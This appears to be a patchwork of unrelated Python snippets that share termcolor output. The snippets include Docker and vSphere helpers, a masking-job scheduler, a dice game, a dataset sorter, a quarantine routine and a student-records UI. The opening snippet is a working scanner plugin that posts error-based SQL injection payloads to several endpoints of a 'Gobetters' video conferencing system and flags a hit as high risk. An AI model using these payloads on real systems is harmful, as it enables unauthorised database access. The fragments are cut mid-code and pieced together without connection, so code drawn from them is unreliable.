"deptid": "0", "deptname": "123", "userid": "1 AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", "level": "123", "username": "******", "realname": "admin", "userpass": "******", "sex": "1", "sex": "1", "email": "*****@*****.**", "mobile": "123", "telephone": "123", "roleid": "0" } req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: cprint( "[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red") return True, vulnurl, "Gobetters视频会议系统SQL注入漏洞", str( post_data), req.text vulnurl = self.url + "/web/department/departmentsave.php" post_data = { "deptid": "1", "deptcode": "1", "deptlogo": "1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "deptdesc": "1" } req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: cprint( "[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red") return True, vulnurl, "Gobetters视频会议系统SQL注入漏洞", str( post_data), req.text vulnurl = self.url + "/web/monitor/monitormentsave.php" post_data = { "deptid": "1", "deptcode": "1", "deptlogo": "1'AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "deptdesc": "1" } req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: cprint( "[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red") return True, vulnurl, "Gobetters视频会议系统SQL注入漏洞", str( post_data), req.text vulnurl = self.url + "/web/users/result.php" post_data = { "username": "******" } req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: cprint( "[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red") return True, vulnurl, "Gobetters视频会议系统SQL注入漏洞", str( post_data), req.text else: cprint("[-]不存在gobetters_multi_sqli漏洞", "white", "on_grey") return False, None, None, None, None except: cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan") return False, None, None, None, None
" --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file(src, dest)) self.run(['sudo'] + self.__docker.update_file_ownership(dest)) def docker_copy_file_out(self, src, dest): cprint( "[" + self.hostname + "][Docker]: copy file from docker " + src + " --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file_out(src, dest)) def docker_seq_run(self, exec_cmd, local_pfwd=[], remote_pfwd=[], async=False): cprint("[" + self.hostname + "][Docker]: run script:" + exec_cmd + ".", self.__output_color) self.run(['sudo'] + self.__docker.run([exec_cmd]), local_pfwd=local_pfwd, remote_pfwd=remote_pfwd, async=async) def docker_para_run(self, run_conf, exec_cmd, hostfile_path, local_pfwd=[], remote_pfwd=[], async=False): cprint( "[" + self.hostname + "][Docker]: run parallel script:" + exec_cmd + ".", self.__output_color)
cluster_hosts = [] cluster_hosts_sorted = sorted(cluster_hosts) vm_vlan_tags = [] for c in clusters: if cSearch in c.name: cluster_name.append(c.name) if not cluster_name: print("No clusters match your search.\n") for c in clusters: for cl in cluster_name: if cl == c.name: print("-" * 80) cprint("Cluster Name: " + cl, 'red', attrs=['bold']) for h in c.host: f = si.content.customFieldsManager.field print(h.name) for k, v in [(x.name, v.value) for x in f for v in h.customValue if x.key == v.key]: print("{}: {}".format(k, v)) vm_vlan_tags.clear() for n in h.network: try: if 'DVUp' in n.name: pass else: vm_vlan_tags.append(n.name.split('_')[1]) except: pass
def read_configs(self): # on windows # os.system('color') ####self.pull_jobexeclist() engine_list = self.create_dictobj(self.enginelistfile) job_list = self.create_dictobj(self.joblistfile) jobexec_list = self.create_dictobj(self.jobexeclistfile) enginecpu_list = self.create_dictobj(self.enginecpulistfile) self.df_enginelist = pd.read_csv(self.enginelistfile) self.df_enginelist['totalgb'] = self.df_enginelist['totalgb'] * 1024 self.df_enginelist['systemgb'] = self.df_enginelist['systemgb'] * 1024 self.df_enginelist.rename(columns={ 'totalgb': 'totalmb', 'systemgb': 'systemmb' }, inplace=True) enginelist = [] for engine in engine_list: engine_list_dict = collections.OrderedDict( ip_address=engine['ip_address'], totalmb=int(engine['totalgb']) * 1024, systemmb=int(engine['systemgb']) * 1024) enginelist.append(engine_list_dict) print_debug("engine_list:\n{}".format(engine_list)) print_debug("enginelist:\n{}".format(enginelist)) engine_list = enginelist if os.path.exists(self.enginecpulistfile): self.df_enginecpulist = pd.read_csv(self.enginecpulistfile) if self.df_enginecpulist.empty: self.df_enginecpulist['cpu'] = (100 - self.df_enginecpulist['cpu']) self.df_joblist = pd.read_csv(self.joblistfile) self.df_jobexeclist = pd.read_csv(self.jobexeclistfile) self.df_joblistunq = self.df_joblist.drop_duplicates(subset=[ 'jobid', 'jobname', 'jobmaxmemory', 'reservememory', 'environmentid', 'environmentname' ], keep='first') job_requirement = self.df_joblistunq.query( "environmentname == @self.envname and jobid == @self.jobid") jobmaxmemory = job_requirement['jobmaxmemory'].values[0] reservememory = job_requirement['reservememory'].values[0] bannertext = banner() print(" ") print((colored(bannertext.banner_sl_box(text="Requirements:"), 'yellow'))) print(' Jobid = {}'.format(self.jobid)) print(' Env = {}'.format(self.envname)) print(' MaxMB = {} MB'.format(jobmaxmemory)) print(' ReserveMB = {} MB'.format(reservememory)) print(' Total = {} MB'.format(jobmaxmemory + reservememory)) if self.config.verbose or self.config.debug: print((colored( bannertext.banner_sl_box(text="Available Engine Pool:"), 'yellow'))) print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Total Memory(MB)", "System Memory(MB)")) for ind in self.df_enginelist.index: print('{0:>1}{1:<35}{2:>20}{3:>20}'.format( " ", self.df_enginelist['ip_address'][ind], self.df_enginelist['totalmb'][ind], self.df_enginelist['systemmb'][ind])) print((colored(bannertext.banner_sl_box(text="CPU Usage:"), 'yellow'))) print('{0:>1}{1:<35}{2:>20}'.format("", "Engine Name", "Used CPU(%)")) for ind in enginecpu_list: print('{0:>1}{1:<35}{2:>20}'.format(" ", ind['ip_address'], ind['cpu'])) engineusage = self.df_jobexeclist.query( "jobstatus == 'RUNNING'").groupby( 'ip_address')['jobmaxmemory'].sum().reset_index( name="totalusedmemory") if engineusage.empty: engineusage = pd.DataFrame() engineusage = self.df_enginelist[['ip_address']].copy() engineusage['totalusedmemory'] = 0 print((colored(bannertext.banner_sl_box(text="Memory Usage:"), 'yellow'))) print('{0:>1}{1:<35}{2:>20}'.format("", "Engine Name", "Used Memory(MB)")) for ind in engineusage.index: print('{0:>1}{1:<35}{2:>20}'.format( " ", engineusage['ip_address'][ind], engineusage['totalusedmemory'][ind])) # for ind in engineusage_od: # print ('{0:>1}{1:<35}{2:>20}'.format(" ",ind['ip_address'],ind['totalusedmemory'] )) if self.config.verbose or self.config.debug: print((colored( bannertext.banner_sl_box(text="Engine Current Usage:"), 'yellow'))) print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Used Memory(MB)", "Used CPU(%)")) if self.df_enginecpulist.empty: engineusage['cpu'] = 0 else: engineusage = pd.merge(engineusage, self.df_enginecpulist, on="ip_address", how="left").fillna(0) if self.config.verbose or self.config.debug: for ind in engineusage.index: print('{0:>1}{1:<35}{2:>20}{3:>20}'.format( " ", engineusage['ip_address'][ind], engineusage['totalusedmemory'][ind], engineusage['cpu'][ind])) if self.config.verbose or self.config.debug: print((colored( bannertext.banner_sl_box( text="Shortlisted Engines for running Job:"), 'yellow'))) print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Job ID", "Env Name")) engine_pool_for_job = self.df_joblist.query( "environmentname == @self.envname and jobid == @self.jobid") if self.config.verbose or self.config.debug: for ind in engine_pool_for_job.index: print('{0:>1}{1:<35}{2:>20}{3:>20}'.format( " ", engine_pool_for_job['ip_address'][ind], engine_pool_for_job['jobid'][ind], engine_pool_for_job['environmentname'][ind])) # print((colored(bannertext.banner_sl_box(text="Result:"),'yellow'))) jpd1 = pd.merge(engine_pool_for_job, self.df_enginelist, on="ip_address", how="left") jpd2 = pd.merge(jpd1, engineusage, on="ip_address", how="left").fillna(0) jpd2['availablemb'] = jpd2['totalmb'] - jpd2['systemmb'] - jpd2[ 'totalusedmemory'] - jobmaxmemory - reservememory qualified_engines = jpd2.query("availablemb > 0") unqualified_engines = jpd2.query("availablemb < 1") if qualified_engines.empty: redcandidate = unqualified_engines.groupby( 'ip_address')['availablemb'].max().reset_index( name="maxavailablememory") redcandidate['maxavailablememory'] = redcandidate[ 'maxavailablememory'] + jobmaxmemory + reservememory if self.df_enginecpulist.empty: redcandidatewithcpu = redcandidate redcandidate['cpu'] = 0 else: redcandidatewithcpu = pd.merge(redcandidate, self.df_enginecpulist, on="ip_address", how="left").fillna(0) if self.config.verbose or self.config.debug: print((colored(bannertext.banner_sl_box(text="Red Engines:"), 'yellow'))) print(colored(redcandidatewithcpu, 'red')) print( " All engines are busy. Running job# {} of environment {} may cause issues." .format(self.jobid, self.envname)) print( " Existing jobs may complete after sometime and create additional capacity to execute new job." ) print(" Please retry later.") else: if not unqualified_engines.empty: redcandidate = unqualified_engines.groupby( 'ip_address')['availablemb'].max().reset_index( name="maxavailablememory") redcandidate['maxavailablememory'] = redcandidate[ 'maxavailablememory'] + jobmaxmemory + reservememory if self.df_enginecpulist.empty: redcandidatewithcpu = redcandidate redcandidate['cpu'] = 0 else: redcandidatewithcpu = pd.merge(redcandidate, self.df_enginecpulist, on="ip_address", how="left").fillna(0) if self.config.verbose or self.config.debug: print( (colored(bannertext.banner_sl_box(text="Red Engines:"), 'yellow'))) print(colored(redcandidatewithcpu, 'red')) bestcandidate = qualified_engines.groupby( 'ip_address')['availablemb'].max().reset_index( name="maxavailablememory") if self.df_enginecpulist.empty: bestcandidatedetails = bestcandidate bestcandidatedetails['cpu'] = 0 else: bestcandidatedetails = pd.merge(bestcandidate, self.df_enginecpulist, on="ip_address", how="left").fillna(0) if self.config.verbose or self.config.debug: print((colored(bannertext.banner_sl_box(text="Green Engines:"), 'yellow'))) print(colored(bestcandidatedetails, 'green')) print((colored(bannertext.banner_sl_box(text="Best Candidate:"), 'yellow'))) print(" ") win_engine = bestcandidatedetails.iloc[ bestcandidatedetails['maxavailablememory'].idxmax()] engine_name = win_engine['ip_address'] engine_mem = win_engine['maxavailablememory'] engine_cpu = win_engine['cpu'] print( colored( " Engine : {} , Available Memory : {} MB , Available CPU : {}% " .format(engine_name, engine_mem, engine_cpu), color='green', attrs=['reverse', 'blink', 'bold'])) if self.run: apikey = self.get_auth_key(engine_name) # print(apikey) job_exec_response = self.exec_job(engine_name, apikey, self.jobid) if job_exec_response is not None: if job_exec_response['status'] == 'RUNNING': executionId = job_exec_response['executionId'] # print(colored(" Execution of Masking job# {} with execution ID {} on Engine {} is in progress".format(self.jobid,executionId,engine_name),'green')) print_green_on_white = lambda x: cprint( x, 'blue', 'on_white') print_green_on_white( " Execution of Masking job# {} with execution ID {} on Engine {} is in progress" .format(self.jobid, executionId, engine_name)) else: # print(colored(" Execution of Masking job# {} on Engine {} failed".format(self.jobid,engine_name),'red')) print_red_on_white = lambda x: cprint( x, 'red', 'on_white') print_red_on_white( " Execution of Masking job# {} on Engine {} failed" .format(self.jobid, engine_name)) else: print_red_on_white = lambda x: cprint(x, 'red', 'on_white') print_red_on_white( " Execution of Masking job# {} on Engine {} failed". format(self.jobid, engine_name)) print(" ")
print(f"-+-+-+- RONDA {i} -+-+-+-") valor = dado() print(f"Salió el: {valor}") go = True while go: print("Posiciones diponibles:") print(disp) jug = input("En qué casillero quieres ponerlo?: ") coor = jug.strip().lower() if coor not in pos_lugares: print(termcolor.colored("Posición inválida, intenta de nuevo.", "red")) else: if coor in used: print(termcolor.colored(f"Ya colocaste un número en la posición {coor}.", "red")) print(reminder) else: Player1.colocar(coor, valor) print(f"Pusiste un {valor} en la posición {coor}.") disp.remove(coor) used.append(coor) print("Tablero actual") Player1.print_tablero() go = False print("FIN DEL JUEGO\nContemos el puntaje...") print("Tablero final del jugador") Player1.print_tablero() Player1.p = contar_puntos(Player1.matriz) string = termcolor.cprint(f"El puntaje es {Player1.p}", "white" , "on_blue") print(string)
def single_turn(unittype, generated_map, CarSetting): walkables = all_walkable(generated_map) # print('walkables=', walkables, '#-# '*10) # 设置随机数种子seed np.random.seed(456789) # 生成5个均值为len(walkables)//20,标准差为5的正态分布样本,模拟电量 r = np.random.normal(loc=len(walkables) // 20, scale=5, size=5) simulate_battery_init = int(r[random.randint(0, 4)]) print("正态分布样 simulate_battery_init:", simulate_battery_init) s, e = None, None # 模拟早上和晚上 if random.randint(0, 1) == 0: # 模拟早上 s = walkables[random.randint(0, len(walkables) - 1)] while s[2] != 2: s = walkables[random.randint(0, len(walkables) - 1)] e = walkables[random.randint(0, len(walkables) - 1)] else: # 模拟晚上,正好相反 e = walkables[random.randint(0, len(walkables) - 1)] while e[2] != 2: e = walkables[random.randint(0, len(walkables) - 1)] s = walkables[random.randint(0, len(walkables) - 1)] # 更多场景 可以修改上面的代码 start_grid = Grid(s[0], s[1]) end_grid = Grid(e[0], e[1]) print("-" * 10, "run new simulation turn", "-" * 10, "\n") # 设置起点和终点 # start_grid = Grid(2, 1) # end_grid = Grid(2, 5) # if CarSetting.behavior_type == 0 : # s = walkables[random.randint(0, len(walkables)//2)] # e = walkables[random.randint(len(walkables)//2, len(walkables)-1)] # start_grid = Grid(s[0], s[1]) # end_grid = Grid(e[0], e[1]) # if CarSetting.behavior_type == 1: # s = walkables[random.randint(0, len(walkables)//2)] # e = walkables[random.randint(len(walkables)//2, len(walkables)-1)] # start_grid = Grid(s[0], s[1]) # if random.randint(0, 4) > 2: # end_grid = Grid(parkings[unittype][0], parkings[unittype][1]) # else: # end_grid = Grid(e[0], e[1]) # if CarSetting.behavior_type == 2: # s = walkables[random.randint(0, len(walkables)//2)] # e = walkables[random.randint(len(walkables)//2, len(walkables)-1)] # if random.randint(0, 4) > 2: # start_grid = Grid(inners[unittype][0], inners[unittype][1]) # else: # start_grid = Grid(s[0], s[1]) # end_grid = Grid(e[0], e[1]) # if CarSetting.behavior_type == 3 : # s = walkables[random.randint(0, len(walkables)//3)] # e = walkables[random.randint(len(walkables)//3, len(walkables)-1)] # start_grid = Grid(s[0], s[1]) # end_grid = Grid(e[0], e[1]) # 搜索街区终点 result_grid = mycar_walking(start_grid, end_grid, generated_map) # 回溯街区路径 path = [] while result_grid is not None: path.append(Grid(result_grid.x, result_grid.y)) result_grid = result_grid.parent ALL_PATHS.append(path) abel_score = 0 # 输出街区和路径,路径用星号表示 for i in range(0, len(generated_map)): for j in range(0, len(generated_map[0])): if contain_grid(path, i, j): # star = colored('*', 'magenta', attrs=['reverse', 'blink']) # print(star +", ", end="") cprint("*" + ", ", "green", attrs=["reverse", "blink"], end="") abel_score += 1 else: if generated_map[i][j] == 1: cprint("1" + ", ", "grey", attrs=["reverse", "blink"], end="") else: print(str(generated_map[i][j]) + ", ", end="") print() print("abel_score=", abel_score) return abel_score
def print_seqs(seq_list): for i in range(0, len(seq_list)): termcolor.cprint( f"Sequence {i}: (Length: {seq_list[i].len()}) {seq_list[i]}", "blue")
import sys from termcolor import colored, cprint cprint('Hello, World!', 'cyan', attrs=['bold']) print() cprint("Attention!", 'red', file=sys.stderr)
splits_file).exists() and (unsorted_path).is_dir(): print("Sorting dataset...") print("Classes: {} ({})".format(get_classes(classes_file), classes_file)) print("Splits: {} ({})".format( get_splits(splits_file)["Names"], splits_file)) sort_dataset(get_splits(splits_file), get_classes(classes_file), unsorted_path, out_path) elif args.command == "package": if args.output is not None: out_path = pathlib.Path(args.output) if not args.no_changelog and not update_changelog(data_dir): cprint("Packaging dataset without adding a changelog message.", 'red') if args.update: print("Updating dataset information...") update_info(data_dir, verbose=False) print("Packaging dataset...") out_file = None if len(out_path.suffixes) == 0: out_path.mkdir(parents=True, exist_ok=True) dataset_name = "NULL" with open(info_file) as f: dataset_name = f.readline().split('\n')[0] out_file = out_path / ("{}-{}.zip".format( dataset_name, date.today().strftime("%Y-%m-%d")))
def spicy_file(path, filename, detection_type, arch, detected_as): if path is not None and filename is not None and detection_type is not None and detected_as is not None and arch is not None: full_path = "{}/{}".format(path, filename) cprint("[ !! ] THATS ONE SPICY MEATBALL, TRYING TO COOL IT DOWN [ !! ]", "blue", attrs=['dark', 'bold']) key = get_random_bytes(32) # currently limited to 32 bytes, should be strong enough. nonce = get_random_bytes(24) # max length for Nonce. try: if key is not None: from .db_create import insert_blob # Will upgrade to XChaCha_Poly1305 as its more secure than ChaCha20_poly1305 cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce) # outfiles are stored under the name K-encryption-key__N-nonce__O-original-filename.cold outFile = '{}/quarantine/data/cold_files/K-{}__N-{}__O-{}.cold'.format( HOME, str(base64.urlsafe_b64encode(key).decode()), str(base64.urlsafe_b64encode(nonce).decode()), filename.replace(".", "_") ) with open(full_path, "rb") as source, open(outFile, "wb") as dest: for line in source.readlines(): # Tag is generated by the chacha20_poly1305 to verify data. we will be using this to verify # any/all data encrypted by penne. ct, tag = cipher.encrypt_and_digest(line) dest.write(ct) a = input("Do we need to upload?") to_upload = {"APIKEY": check_prem()['API_KEY'], "Upload": False} if a.lower() == 'n': pass else: to_upload.update({'Upload': True}) insert_blob(ct, outFile, path, filename, True, to_upload, nonce, key, tag, detected_as) return { "Success": True, "Encrypted": True, "Uploaded": False, "Key": "{}".format(base64.urlsafe_b64encode(key)), "Nonce": "{}".format(base64.urlsafe_b64encode(nonce)), "Tag": "{}".format(base64.urlsafe_b64encode(tag)), "ColdFile": outFile, "Original_File": filename, "Found_where": path, "DetectedAs": detection_type, "Cold_Time": datetime.datetime.now(), "Detection": detected_as } else: log.critical("Error when deriving key. The key could not be derived, " "this is a critical error and the application cannot continue.") return { "Success": False, "Encrypted": False, "Uploaded": False, "Key": None, "Nonce": None, "ColdFile": None, "Original_File": filename, "Found_where": path, "DetectedAs": detection_type, "Cold_Time": datetime.datetime.now(), "Detection": detected_as } except TypeError: log.critical("unable to encrypt file: {}".format("{}/{}".format(path, filename))) COMPLETED_RESULTS["unable_to_cold_store"].append("{}/{}".format(path, filename)) return { "Success": False, "Encrypted": False, "Uploaded": False, "Key": None, "Nonce": None, "ColdFile": None, "Original_File": filename, "Found_where": path, "DetectedAs": detection_type, "Cold_Time": datetime.datetime.now(), "Detection": detected_as }
def manage_list_view(lst, direction): global list_cursor_indx global start global end global col col, row = os.get_terminal_size() row -= 3 remove_list_cursor(lst, list_cursor_indx) if direction == 0: list_cursor_indx -= 1 if list_cursor_indx < start: start -= 1 end = start + row if list_cursor_indx < 0: list_cursor_indx = len(lst) - 1 start = len(lst) - row end = start + row if len(lst) < row: start = 0 end = row else: list_cursor_indx += 1 if list_cursor_indx >= end: end += 1 start += 1 if list_cursor_indx >= len(lst): list_cursor_indx = 0 start = 0 end = row add_list_cursor(lst, list_cursor_indx) os.system('clear') cprint('ID', 'red', end=' ', attrs=['bold']) cprint(' Name ', 'green', end=' ', attrs=['bold']) cprint('Class', 'magenta', end=' ', attrs=['bold']) cprint('Section', 'blue', end=' ', attrs=['bold']) cprint('Date of birth', 'yellow', end=' ', attrs=['bold']) cprint('Address', 'white', end=' ', attrs=['bold']) cprint('Phone ', 'cyan', attrs=['bold']) cprint('=' * col, 'red', attrs=['bold']) for i in lst[start:end]: a, b, c, d, e, f, g, h = i print(a, b, c, d, e, f, g, h)
def sort_dataset(splits, classes, unsorted_dir, out_dir): # Create directories for splits for split in splits["Names"]: (out_path / split).mkdir(parents=True, exist_ok=True) log_file = open(out_dir / "sorting.log", mode="w+") classes_files = list(unsorted_path.glob("**/_classes.csv")) manual_classes = [ k for k in classes_files if str(k.relative_to(unsorted_path).parent) in splits ] count = 0 copied = 0 skipped = 0 total = count_entries(manual_classes) for csv in manual_classes: data = pd.read_csv(csv, dtype={'id': np.int32}) # Directory with video segments corresponding to this csv file seg_dir = csv.parent / 'segments' # Set output root directory curr = str(csv.relative_to(unsorted_path).parent) if curr in splits: out_dir = out_path / splits[curr] / curr out_dir.mkdir(parents=True, exist_ok=True) curr_splits = 0 # Create output directories for each class for c in classes: (out_dir / c).mkdir(parents=True, exist_ok=True) # For each row of the manual classification file for index, row in enumerate(data.itertuples()): infile = seg_dir / "{:06d}.mp4".format(row.id) print_progress(count, total, end="") # If second row contains an error type, skip if pd.notnull(row.notes) and any( [x in row.notes for x in errors]): cprint(" Skipped ({:06d}, {}, {}) ".format( row.id, row.tag, row.notes, row.validated), 'red', end="\r", flush=True) log_file.write( "Skipped copying file {} with entry ({:06d}, {}, {}). Reason: Matched a known error subclass.\n" .format(infile, row.id, row.tag, row.notes)) skipped += 1 # If second row contains a speaker change, split video at change and skip elif pd.notnull(row.notes) and "Speaker Change" in row.notes: print("", end="\r") cprint( "Found Speaker Change in file {} at {:06d}. Splitting data into new set." .format(csv, row.id), 'blue', flush=True) curr_splits += 1 curr = str(csv.relative_to( unsorted_path).parent) + "-" + str(curr_splits) out_dir = out_dir.parent / curr out_dir.mkdir(parents=True, exist_ok=True) for c in classes: (out_dir / c).mkdir(parents=True, exist_ok=True) log_file.write( "Split video dataset defined in {} at {} due to speaker change. New ID: {}\n" .format(csv, row.id, curr)) skipped += 1 # If validation failed, skip elif pd.isnull(row.validated) or row.validated == False: cprint(" Skipped ({:06d}, {}, {}) ".format( row.id, row.tag, row.notes, row.validated), 'red', end="\r", flush=True) log_file.write( "Skipped copying file {} with entry ({:06d}, {}, {}). Reason: Validation failure.\n" .format(infile, row.id, row.tag, row.notes)) skipped += 1 # If second row is not null, show a message but copy anyways elif pd.notnull(row.notes): cprint(" Copying ({:06d}, {}, {}) ".format( row.id, row.tag, row.notes, row.validated), 'yellow', end="\r", flush=True) outfile = out_dir / row.tag / "{:06d}.mp4".format(row.id) shutil.copy(str(infile), str(outfile)) copied += 1 # If first row is a valid class name, copy file to output directory elif row.tag in classes: print(" Copying ({:06d}, {})... ".format( row.id, row.tag), end="\r", flush=True) outfile = out_dir / row.tag / "{:06d}.mp4".format(row.id) shutil.copy(str(infile), str(outfile)) copied += 1 # Otherwise, show an error and skip else: print("", end="\r") cprint( "Failed to copy ({:06d}, {}, {}): Unknown class '{}'". format(row.id, row.tag, row.notes, row.tag), 'red', flush=True) log_file.write( "Skipped copying file {} with entry ({:06d}, {}, {}). Reason: Unknown class {}.\n" .format(infile, row.id, row.tag, row.notes, row.tag)) skipped += 1 count += 1 sys.stdout.flush() print( "\rDone. Copied {} files with {} classes. ({} skipped, see log file for details) " .format(copied, len(classes), skipped)) log_file.close()
cprint('Phone : ', 'yellow', end='', attrs=['bold']) cprint(phn, 'cyan', attrs=['bold']) cprint('Press any key to continue...', 'blue', attrs=['bold']) getch.getch() add_list_cursor(tmp_lst, list_cursor_indx) break if __name__ == '__main__': welcome_scr() getch.getch() data_base = database() lst = main_menu() add_cursor(lst, cursor_indx) x = colored('||', 'yellow', attrs=['bold']) cprint('=' * col, 'yellow', attrs=['bold']) for i in lst: print(x, i, ' ' * (col - len(i[5:-4]) - 4), x) cprint('=' * col, 'yellow', attrs=['bold']) while True: inp = getch.getch() if inp == '\n': if cursor_indx == 0: data = add_scr() if data != None: data_base.insert_new(data) cprint('Added new record successfully !', 'cyan', attrs=['bold']) else: os.system('clear')
def search_scr(): global start global end global list_cursor_indx start = 0 list_cursor_indx = 0 os.system('clear') cprint('Leave empty if you dont want that option as search key', 'yellow', attrs=['bold']) cprint('ID : ', 'green', attrs=['bold']) ID = input() + '%' cprint('First name : ', 'green', attrs=['bold']) fname = input() + '%' cprint('Last name : ', 'green', attrs=['bold']) lname = input() + '%' cprint('Class : ', 'green', attrs=['bold']) clas = input() + '%' cprint('Section : ', 'green', attrs=['bold']) sec = input() + '%' cprint('Phone : ', 'green', attrs=['bold']) phn = input() + '%' search_key = (ID, fname, lname, clas, sec, phn) tmp_lst = data_base.search(search_key) for i, j in enumerate(tmp_lst): a, b, c, d, e, f, g, h = j a = colored(a, 'red', attrs=['bold']) b = colored(b, 'green', attrs=['bold']) c = colored(c, 'green', attrs=['bold']) d = colored(d, 'magenta', attrs=['bold']) e = colored(e, 'blue', attrs=['bold']) f = colored(f, 'yellow', attrs=['bold']) g = colored(g, 'white', attrs=['bold']) h = colored(h, 'cyan', attrs=['bold']) tmp_lst[i] = (a, b, c, d, e, f, g, h) list_cursor_indx = len(tmp_lst) - 1 add_list_cursor(tmp_lst, list_cursor_indx) manage_list_view(tmp_lst, 1) while True: inp = getch.getch() if inp == '+': manage_list_view(tmp_lst, 1) elif inp == '-': manage_list_view(tmp_lst, 0) elif inp == '\x7f': break elif inp == '\n': remove_list_cursor(tmp_lst, list_cursor_indx) ID, fname, lname, clas, sec, dob, adrs, phn = tmp_lst[ list_cursor_indx] os.system('clear') cprint('ID : ', 'yellow', end='', attrs=['bold']) cprint(ID, 'cyan', attrs=['bold']) cprint('Name : ', 'yellow', end='', attrs=['bold']) cprint(fname + ' ' + lname, 'cyan', attrs=['bold']) cprint('Class : ', 'yellow', end='', attrs=['bold']) cprint(str(clas) + ', ' + sec, 'cyan', attrs=['bold']) cprint('Date of birth : ', 'yellow', end='', attrs=['bold']) cprint(dob, 'cyan', attrs=['bold']) cprint('Address : ', 'yellow', end='', attrs=['bold']) cprint(adrs, 'cyan', attrs=['bold']) cprint('Phone : ', 'yellow', end='', attrs=['bold']) cprint(phn, 'cyan', attrs=['bold']) cprint('Press any key to continue...', 'blue', attrs=['bold']) getch.getch() add_list_cursor(tmp_lst, list_cursor_indx) break
def listen(): print(f"Waiting for connections (IP,PORT:{IP,PORT})") (cs, client_ip_port) = listensock.accept() print("A client has connected to the server!") msg_raw = cs.recv(2048) msg = msg_raw.decode() return [msg, cs] #Server runs on a loop until the CLOSE command is sent while Open: m = listen() if "PING" in m: termcolor.cprint("PING command!", 'green') print("OK!") r = "OK!\n" m[1].send(r.encode()) elif "GET" in m[0]: termcolor.cprint("GET requested", "green") num = int(m[0][-1]) r = genelist[num] print(r) m[1].send(r.encode()) elif "INFO " in m[0]: termcolor.cprint("INFO requested", "green") seq = Seq(m[0][5:]) r = (f"SECUENCE:{seq.__str__()} Length:{seq.len()}\n") for element in seq.seq_count(): percent = seq.seq_count()[element] / seq.len() * 100
def add_scr(): os.system('clear') cprint('First name : ', 'yellow', end='', attrs=['bold']) fname = input() cprint('Last name : ', 'yellow', end='', attrs=['bold']) lname = input() cprint('Date of birth : ', 'yellow', end='', attrs=['bold']) dob = input() cprint('Class : ', 'yellow', end='', attrs=['bold']) try: clas = input() if len(clas) != 0: clas = int(clas) except: cprint('Entered invalid input !', 'red', attrs=['bold']) cprint('Press any key to continue...\nPress c to cancel...', 'blue', attrs=['bold']) if getch.getch() == 'c': return None return add_scr() cprint('Section : ', 'yellow', end='', attrs=['bold']) sec = input() cprint('Address : ', 'yellow', end='', attrs=['bold']) adrs = input() cprint('Phone : ', 'yellow', end='', attrs=['bold']) try: phn = input() if len(phn) != 0: phn = int(phn) except: cprint('Entered invalid input !', 'red', attrs=['bold']) cprint('Press any key to continue...\nPress c to cancel...', 'blue', attrs=['bold']) if getch.getch() == 'c': return None return add_scr() os.system('clear') cprint('Name : ', 'yellow', end='', attrs=['bold']) cprint(fname + ' ' + lname, 'cyan', attrs=['bold']) cprint('Class : ', 'yellow', end='', attrs=['bold']) cprint(str(clas) + ', ' + sec, 'cyan', attrs=['bold']) cprint('Date of birth : ', 'yellow', end='', attrs=['bold']) cprint(dob, 'cyan', attrs=['bold']) cprint('Address : ', 'yellow', end='', attrs=['bold']) cprint(adrs, 'cyan', attrs=['bold']) cprint('Phone : ', 'yellow', end='', attrs=['bold']) cprint(phn, 'cyan', attrs=['bold']) tmp_lst = data_base.search(('%', fname, lname, clas, sec, phn)) if len(tmp_lst) != 0: cprint( '\nWarning! there are {} records same as this one.\nMake sure that these are not same student...\n' .format(len(tmp_lst)), 'red', attrs=['bold']) for i in tmp_lst: a, b, c, d, e, f, g, h = i a = colored(a, 'red', attrs=['bold']) b = colored(b, 'green', attrs=['bold']) c = colored(c, 'green', attrs=['bold']) d = colored(d, 'magenta', attrs=['bold']) e = colored(e, 'blue', attrs=['bold']) f = colored(f, 'yellow', attrs=['bold']) g = colored(g, 'white', attrs=['bold']) h = colored(h, 'cyan', attrs=['bold']) print(a, b, c, d, e, f, g, h) cprint('\n\nDo you rally want to save this record? (y/n)', 'magenta', attrs=['bold']) inp = input() if inp == 'y': return (None, fname, lname, clas, sec, dob, adrs, phn) return None
